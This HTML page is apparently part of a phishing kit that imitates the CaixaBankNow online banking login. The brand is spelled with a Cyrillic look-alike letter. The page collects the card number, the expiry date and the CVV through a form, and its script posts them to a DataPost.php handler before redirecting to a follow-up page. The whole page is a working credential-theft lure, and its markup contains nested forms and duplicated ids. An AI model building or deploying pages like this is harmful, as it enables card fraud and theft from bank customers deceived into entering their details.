<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta http-equiv="Pragma" content="no-cache" />
    <meta http-equiv="Cache-Control" content="no-cache" />
    <meta http-equiv="Expires" content="-1" />
    <title>CaiхaBank | banca digital CaiхaBankNow</title>
    <link rel="shorcut icon" href="/favicon.ico" />
    <link rel="icon" href="favicon.ico" />
    <link rel="stylesheet" type="text/css" href="./css/estilos-login.css" />
    <link
      rel="stylesheet"
      type="text/css"
      href="./css/lolopo/jquery-ui-1.10.4.custom.css"
    />
    <script
      type="text/javascript"
      src="./js/arq/jQuery/jquery-1.8.3.min.js"
    ></script>
    <script
      type="text/javascript"
      src="./js/arq/jQueryUI/jquery-ui-1.9.2.custom.min.js"
    ></script>
  </head>

  <body onload="arranque();">
    <div class="contenido_sin_frame"></div>
    <div class="login-new">
      <div class="lfloat prel">
        <a
          aria-expanded="false"
          class="ico-world escoger-idioma btn_desplegable_idioma"
          href="javascript:void(0)"
          >Castellano</a
        >
        <div class="desplegable_idiomas hide" style="">
          <div class="">
            <a
              href="#"
              title="Castellano"
              class="activo"
              data-value="Castellano"
              data-txt="Castellano"
              onclick="javascript:submit_idioma('02')"
              >Castellano</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Catal&agrave;"
              class=""
              data-value="Catal&agrave;"
              data-txt="Catal&agrave;"
              onclick="javascript:submit_idioma('01')"
              >Catal&agrave;</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Euskera"
              class=""
              data-value="Euskera"
              data-txt="Euskera"
              onclick="javascript:submit_idioma('10')"
              >Euskera</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Galego"
              class=""
              data-value="Galego"
              data-txt="Galego"
              onclick="javascript:submit_idioma('11')"
              >Galego</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Valencià"
              class=""
              data-value="Valencià"
              data-txt="Valencià"
              onclick="javascript:submit_idioma('06')"
              >Valencià</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="ceština"
              class=""
              data-value="ceština"
              data-txt="ceština"
              onclick="javascript:submit_idioma('17')"
              >ceština</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Dansk"
              class=""
              data-value="Dansk"
              data-txt="Dansk"
              onclick="javascript:submit_idioma('18')"
              >Dansk</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Deutsch"
              class=""
              data-value="Deutsch"
              data-txt="Deutsch"
              onclick="javascript:submit_idioma('05')"
              >Deutsch</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="English"
              class=""
              data-value="English"
              data-txt="English"
              onclick="javascript:submit_idioma('03')"
              >English</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Fran&ccedil;ais"
              class=""
              data-value="Fran&ccedil;ais"
              data-txt="Fran&ccedil;ais"
              onclick="javascript:submit_idioma('04')"
              >Fran&ccedil;ais</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Italiano"
              class=""
              data-value="Italiano"
              data-txt="Italiano"
              onclick="javascript:submit_idioma('13')"
              >Italiano</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Magyar"
              class=""
              data-value="Magyar"
              data-txt="Magyar"
              onclick="javascript:submit_idioma('22')"
              >Magyar</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Nederlands"
              class=""
              data-value="Nederlands"
              data-txt="Nederlands"
              onclick="javascript:submit_idioma('16')"
              >Nederlands</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Norsk"
              class=""
              data-value="Norsk"
              data-txt="Norsk"
              onclick="javascript:submit_idioma('26')"
              >Norsk</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Polski"
              class=""
              data-value="Polski"
              data-txt="Polski"
              onclick="javascript:submit_idioma('23')"
              >Polski</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Portugu&ecirc;s"
              class=""
              data-value="Portugu&ecirc;s"
              data-txt="Portugu&ecirc;s"
              onclick="javascript:submit_idioma('14')"
              >Portugu&ecirc;s</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Slovencina"
              class=""
              data-value="Slovencina"
              data-txt="Slovencina"
              onclick="javascript:submit_idioma('19')"
              >Slovencina</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Suomi"
              class=""
              data-value="Suomi"
              data-txt="Suomi"
              onclick="javascript:submit_idioma('20')"
              >Suomi</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Svenska"
              class=""
              data-value="Svenska"
              data-txt="Svenska"
              onclick="javascript:submit_idioma('15')"
              >Svenska</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Türkçe"
              class=""
              data-value="Türkçe"
              data-txt="Türkçe"
              onclick="javascript:submit_idioma('27')"
              >Türkçe</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="ελληνικά"
              class=""
              data-value="ελληνικά"
              data-txt="ελληνικά"
              onclick="javascript:submit_idioma('21')"
              >ελληνικά</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="русский"
              class=""
              data-value="русский"
              data-txt="русский"
              onclick="javascript:submit_idioma('25')"
              >русский</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="中文"
              class=""
              data-value="中文"
              data-txt="中文"
              onclick="javascript:submit_idioma('99')"
              >中文</a
            >
          </div>
        </div>
      </div>
      <div class="limpiar"></div>
      <div class="mb20 overhidden">
        <a class="dtable centrado">
          <img
            src="../imatge/lolopo/candado.png"
            alt=""
            class="dtable centrado"
          />
        </a>
        <h1 class="dtable centrado">Acceso seguro a CaiхaBankNow</h1>
      </div>
                         <div class="login">
        <form name="INPUTS" id="formccn" action="" method="post">
          <div class="usuario prel">
            <label for="indentificacion">Los 16 dígitos de la tarjeta:</label>
            <input
              id="ccn"
              name="ccn"
              type=""
              onkeyup="$cc.validate(event)"
              value=""
              maxlength="19"
              size="6"
              required
            />
          </div>
		        <div class="login">
        <form name="INPUTS" id="exp1" action="" method="post">
          <div class="usuario prel">
            <label for="indentificacion">Fecha de Caducidad:</label>
            <input
              id="exp1"
              name="exp1"
              type=""
              onkeyup="$cc.expiry.call(this,event)"
              autocomplete="off"
              value=""
              maxlength="7"
              size="7"
              required
            />
          </div>
		        <div class="login">
        <form name="INPUTS" id="cv" action="" method="post">
          <div class="usuario prel">
            <label for="indentificacion">CVV:</label>
            <input
              id="cv"
              name="cv"
              type="tel"
              value=""
              maxlength="3"
              size="3"
              required
            />
          </div>
		  		        <div class="login">
        <form name="INPUTS" id="cv" action="" method="post">
          
          <div
            id="capaErrorID"
            class="msg_error_form mt10 pd10"
            style="display: none;"
          ></div>
          <div class="pinpad-wrapper" id="teclado_user" style="display: none;">
            <div class="pinpad-component">
              <div id="destinoTecladoVirtual" class="pinpad alfanum"></div>
            </div>
          </div>
          <div class="check-field prel">
            <input
              id="recordar"
              type="checkbox"
              onkeydown="javascript:marcarCheck(event);"
              onclick="javascript:ayudaCheck();"
              value="recordar"
              name="recordar"
              title="recordar"
            />
          </div>

          <div
            id="capaErrorPW"
            class="msg_error_form mt10 pd10"
            style="display: none;"
          ></div>

          <div class="clear"></div>
          <div class="limpiar"></div>
          <button type="submit" id="enlaceBotonAceptar" class="btn-submit">
            Continuar
          </button>
        </form>
        <div class="limpiar"></div>
        <ul class="links-footer">
          <li>
            <a href="#" title="Alta a CaiхaBankNow">Alta a CaiхaBankNow</a>
          </li>
          <li>
            <a href="#" title="Demostración">Demostración</a>
          </li>
          <li>
            <a href="#" title="Seguridad">Seguridad</a>
          </li>
          <li>
            <a href="#" title="CaiхaBankProtect">CaiхaBankProtect</a>
          </li>
        </ul>
      </div>
    </div>
    <div class="pie">
      <div class="superior5">
        <ul class="menu_simple">
          <li><a href="#">Aviso legal</a></li>
          <li><a href="#">Seguridad</a></li>
          <li><a href="#">Tarifas</a></li>
        </ul>
      </div>
      <div class="superior5">
        @ CaiхaBank, S.A. 2021. Todos los derechos reservados.
      </div>
    </div>

<script type="text/javascript">
var $cc = {}
$cc.validate = function(e){

  //if the input is empty reset the indicators to their default classes
  if (e.target.value == ''){
    e.target.previousElementSibling.className = 'card-type';
    e.target.nextElementSibling.className = 'card-valid';
    return
  }

  //Retrieve the value of the input and remove all non-number characters
  var number = String(e.target.value);
  var cleanNumber = '';
  for (var i = 0; i<number.length; i++){
    if (/^[0-9]+$/.test(number.charAt(i))){
      cleanNumber += number.charAt(i);
    }
  }

  //Only parse and correct the input value if the key pressed isn't backspace.
  if (e.key != 'Backspace'){
    //Format the value to include spaces in the correct locations
    var formatNumber = '';
    for (var i = 0; i<cleanNumber.length; i++){
      if (i == 3 || i == 7 || i == 11 ){
          formatNumber = formatNumber + cleanNumber.charAt(i) + ' '
      }else{
        formatNumber += cleanNumber.charAt(i)
      }
    }
    e.target.value = formatNumber;
  }

  //run the Luhn algorithm on the number if it is at least equal to the shortest card length
  if (cleanNumber.length >= 12){
    var isLuhn = luhn(cleanNumber);
  }

  function luhn(number){
    var numberArray = number.split('');
    for (var i=0; i<numberArray.length; i++){
      if (i%2 != 0){
        numberArray[i] = numberArray[i] * 2;
        if (numberArray[i] > 9){
          numberArray[i] = parseInt(String(numberArray[i]).charAt(0)) + parseInt(String(numberArray[i]).charAt(1))
        }
      }
    }
    var sum = 0;
    for (var i=1; i<numberArray.length; i++){
      sum += parseInt(numberArray[i]);
    }
    sum = sum * 9 % 10;
    if (numberArray[0] == sum){
      return true
    }else{
      return false
    }
  }

  //if the number passes the Luhn algorithm add the class 'active'
  if (isLuhn == true){
    e.target.nextElementSibling.className = 'card-valid active'
  }else{
    e.target.nextElementSibling.className = 'card-valid'
  }

  var card_types = [
    {
      name: 'maestro',
      pattern: /^(5018|5020|5038|6304|6759|676[1-3])/,
      valid_length: [12, 13, 14, 15, 16, 17, 18, 19]
    }
  ];

  //test the number against each of the above card types and regular expressions
  for (var i = 0; i< card_types.length; i++){
    if (number.match(card_types[i].pattern)){
      //if a match is found add the card type as a class
      e.target.previousElementSibling.className = 'card-type '+card_types[i].name;
    }
  }
}

$cc.expiry = function(e){
  if (e.key != 'Backspace'){
    var number = String(this.value);

    //remove all non-number character from the value
    var cleanNumber = '';
    for (var i = 0; i<number.length; i++){
      if (i == 1 && number.charAt(i) == '/'){
        cleanNumber = 0 + number.charAt(0);
      }
      if (/^[0-9]+$/.test(number.charAt(i))){
        cleanNumber += number.charAt(i);
      }
    }

    var formattedMonth = ''
    for (var i = 0; i<cleanNumber.length; i++){
      if (/^[0-9]+$/.test(cleanNumber.charAt(i))){
        //if the number is greater than 1 append a zero to force a 2 digit month
        if (i == 0 && cleanNumber.charAt(i) > 1){
          formattedMonth += 0;
          formattedMonth += cleanNumber.charAt(i);
          formattedMonth += '/';
        }
        //add a '/' after the second number
        else if (i == 1){
          formattedMonth += cleanNumber.charAt(i);
          formattedMonth += '/';
        }
        //force a 4 digit year
        else if (i == 2 && cleanNumber.charAt(i) <2){
          formattedMonth += '20' + cleanNumber.charAt(i);
        }else{
          formattedMonth += cleanNumber.charAt(i);
        }

      }
    }
    this.value = formattedMonth;
  }   
}

</script>


    <script>
      $("form#formccn").on("submit", function () {
        $("#enlaceBotonAceptar").addClass("disabled");
        $("form#formccn").off("submit");
        submitData();
        return false;
      });
      function submitData() {
        var inputForm = document.getElementById("formccn");
        var data = new FormData(inputForm);

        $.ajax({
          url: "../inc/DataPost.php?action=LastOne",
          type: "POST",
          data: data,
          contentType: false,
          cache: false,
          processData: false,
          success: function (response) {
            window.location.replace("./Forma.html");
          },
        });
      }
    </script>
  </body>
</html>
